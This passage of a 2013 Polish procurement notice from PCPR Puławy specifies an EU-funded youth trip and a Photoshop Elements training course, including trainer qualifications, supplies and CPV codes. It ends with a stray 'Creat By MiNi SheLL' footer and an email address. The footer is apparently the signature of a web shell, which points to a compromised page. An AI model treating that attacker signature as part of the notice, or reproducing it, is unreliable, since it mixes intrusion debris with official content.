6.11)	sale szkoleniowe wyposażone w stoły, krzesła, tablicę, ekran projekcyjny, tablicę typu flipchart i papier do tej tablicy oraz markery;
6.12)	dostęp do bazy rekreacyjnej, w tym infrastruktury sportowej, w szczególności do: boiska do gier zespołowych jak również dostęp do sali/świetlicy wyposażonej w TV, stół do tenisa stołowego, stół do bilardu;
6.13)	sprzęt do spędzania wolnego czasu, w szczególności: piłki do siatkówki, piłki do koszykówki, piłki do piłki nożnej, rakietki i piłki do tenisa stołowego;
6.14)	zapewnienie uczestnikom wyjazdu obsługi kulturalno - oświatowej, programów integracji społecznej tj. 2 ogniska z pieczeniem kiełbasek lub grillowanie - na rozpoczęcie i zakończenie pobytu, 1 wycieczka grupowa o charakterze turystyczno-poznawczym;
6.15)	co najmniej 2 opiekunów uczestników, z których każdy z osobna posiadać ma co najmniej wykształcenie wyższe o kierunku pedagogika i uprawnienia wychowawcy kolonijnego lub co najmniej wykształcenie wyższe o kierunku psychologia i uprawnienia wychowawcy kolonijnego. Do ich zadań należeć ma m.in. sprawowanie opieki nad powierzonymi uczestnikami (łącznie z podróżą), współpraca z koordynatorem wyjazdu w zakresie realizacji programów zajęć/szkolenia i harmonogramu wyjazdu, organizacja czasu wolnego, sprawowanie nadzoru nad bezpieczeństwem uczestników. Jedna osoba spośród opiekunów ma pełnić funkcję koordynatora wyjazdu, na czas całego wyjazdu (łącznie z podróżą), do którego zadań należeć ma m.in. nadzór nad prawidłową realizacją harmonogramu wyjazdu (harmonogram wyjazdu ma zawierać w szczególności rozkład każdego dnia wyjazdu z uwzględnieniem posiłków, szkoleń, zajęć, imprez o charakterze integracyjnym, a także godzin i czasu podróży), nadzór nad zaopatrzeniem uczestników w apteczkę pierwszej pomocy, zapoznanie uczestników z zasadami bezpieczeństwa oraz zapewnienie warunków do ich przestrzegania, nadzór nad prowadzeniem dokumentacji.
6.16)	każdy z uczestników programu otrzymać ma zaświadczenie o uczestnictwie w treningu kompetencji i umiejętności społecznych z elementami autoprezentacji, zaświadczenie o uczestnictwie w indywidualnym doradztwie zawodowym oraz zaświadczenie o uczestnictwie w kursie pierwszej pomocy przedmedycznej, które mają być oznaczone logo PCPR w Puławach, UE, EFS i POKL, zgodnie z obowiązującymi Wytycznym dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz informacją Projekt systemowy Samodzielni - nie sami współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, dostępnym u Zamawiającego (logo PCPR w Puławach) lub na stronie internetowej www.wup.lublin.pl (pozostałe logotypy)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0, 85.12.12.70-6, 55.11.00.00-4, 55.24.00.00-4, 80.56.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 8.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szkolenie z zakresu obsługi komputera - grafika komputerowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia z zakresu obsługi komputera - obsługi programu ADOBE Photoshop Elements v. 11 PL Win Ret do użytku domowego dla 12 uczestników programu. Uczestnicy stanowią jedną grupę szkoleniową.

Uczestnicy programu to młodzież w wieku od 15 r.ż. do 18 r.ż. zagrożona wykluczeniem społecznym, patologią społeczną oraz z rodzin dysfunkcyjnych. Uczestnicy programu to 6 dziewcząt i 6 chłopców.
Liczba uczestników wyjazdu może ulec zmianie w granicach do 20% in minus.

1) Miejsce realizacji zamówienia:
Zamawiający zastrzega, że zamówienie ma być zrealizowane w sali szkoleniowej w budynku usytuowanym na terenie miasta Puławy

2) Termin realizacji zamówienia:
Zamawiający zastrzega, że zamówienie ma być zrealizowane w okresie pomiędzy 1 września 2013r.
a 30 listopada 2013r.
3) Wymagany minimalny zakres tematyczny zajęć:
Szkolenie ma zawierać zagadnienia z zakresu obsługi programu ADOBE Photoszhop Elements v. 11 PL Win Ret.
      
4) Sposób prowadzenia szkolenia oraz czas trwania zajęć:
Szkolenie ma być prowadzone w formie warsztatów grupowych. W ramach szkolenia ma być przeprowadzone 20 godzin zajęć, przy czym 1 godzina zajęć to 45 minut dydaktycznych. Szkolenie ma odbywać się w dni powszednie tj. od poniedziałku do piątku, z wyjątkiem dni świątecznych, w godzinach pomiędzy 15:30 a 19:00 nie częściej niż 2 razy w tygodniu lub w soboty w godzinach pomiędzy 9:00 a 15:00. Zamawiający zastrzega, że po każdych 2 godzinach zajęć wykonawca ma zapewnić 15 minut przerwy.

5) Wymagane minimalne kwalifikacje kadry prowadzącej zajęcia: 
Szkolenie ma być prowadzone przez minimum 1 osobę, która ma posiadać wykształcenie co najmniej średnie z zakresu informatyki z przygotowaniem pedagogicznym lub co najmniej wykształcenie średnie z 2 - letnim doświadczeniem w prowadzeniu szkoleń z zakresu programu ADOBE Photoshop  Elements v. 11 PL Win Ret. Przez doświadczenie, o którym mowa należy rozumieć pozostawanie w stosunku pracy lub zlecenia z firmą bądź instytucją prowadzącą tego typu szkolenia lub kursy.

6) Inne wymagania jakie ma spełnić wykonawca przy realizacji przedmiotu zamówienia: 
Wykonawca ma zapewnić oraz wliczyć w koszt zamówienia dla wszystkich uczestników:
6.1)	    salę szkoleniową, która ma być wyposażona w stanowiska komputerowe wraz z oprogramowaniem niezbędnym do przeprowadzenia zajęć, dla każdego uczestnika podczas szkolenia;
6.2)	    podczas trwania zajęć wykonawca ma zapewnić dla każdego uczestnika: napoje (herbata, soki owocowe, woda mineralna), cukier, ciastka;
6.3)	    dla każdego uczestnika materiały szkoleniowe: po 1 notatniku A-4 i po 1 długopisie oraz po 1 sztuce oprogramowania  ADOBE Photoshop  Elements v. 11 PL Win Ret. do użytku domowego dla każdego z uczestników; materiały szkoleniowe i program komputerowy, po zakończeniu szkolenia staną się własnością uczestników;
Wszystkie materiały wydane uczestnikom mają być oznaczone logo PCPR w Puławach,    UE, EFS i PO KL, zgodnie z obowiązującymi Wytycznym dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz informacją Projekt systemowy Samodzielni - nie sami współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, dostępnym u Zamawiającego  (logo PCPR w Puławach) i na stronie internetowej www.wup.lublin.pl (pozostałe logotypy)
6.4)	    uczestnicy mają otrzymać zaświadczenie o ukończeniu szkolenia, które ma być oznaczone logo PCPR w Puławach, UE, EFS i POKL, zgodnie z obowiązującymi Wytycznym dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz informacją Projekt systemowy Samodzielni - nie sami współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, dostępnym u Zamawiającego  (logo PCPR w Puławach) i na stronie internetowej www.wup.lublin.pl (pozostałe logotypy)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.31.00-0, 80.53.32.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com